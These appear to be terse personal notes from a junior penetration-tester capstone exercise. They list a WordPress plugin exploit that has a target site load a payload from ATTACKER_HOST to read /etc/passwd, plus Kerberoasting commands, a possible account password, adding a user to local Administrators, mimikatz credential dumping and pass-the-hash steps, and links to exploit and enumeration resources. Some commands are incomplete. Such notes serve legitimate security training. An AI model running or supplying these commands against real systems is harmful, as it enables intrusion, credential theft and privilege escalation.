some notes

Junior Penetration Tester Capstone

https://wpscan.com/vulnerability/9259

  1. Create payload file and host it on a location accessible by a targeted website. Payload content:

    "system('cat /etc/passwd')"

  2. Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

  3. Content of /etc/passwd will be returned

https://linpeas.sh

https://www.exploit-db.com/exploits/50689

setspn -T contoso.azure -Q / tgsrepcrack.py

lkjhgfdsa adrole1

https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/jerry - Tomcat Brute force via hydra

Get-LocalGroupMember -Group "Administrators"
Add-LocalGroupMember -Group "Administrators" -Member "Jeremy"

xfreerdp /u:Jeremy /p: /d:contoso.azure /v:

mimikatz.exe privilege::debug sekurlsa::logonpasswords sekurlsa::pth /u:ContosoAdmin /d:contoso.azure /ntlm

Invoke-WebRequest -Uri -OutFile

https://youtu.be/7bxyWOQuj9c - Pass the hash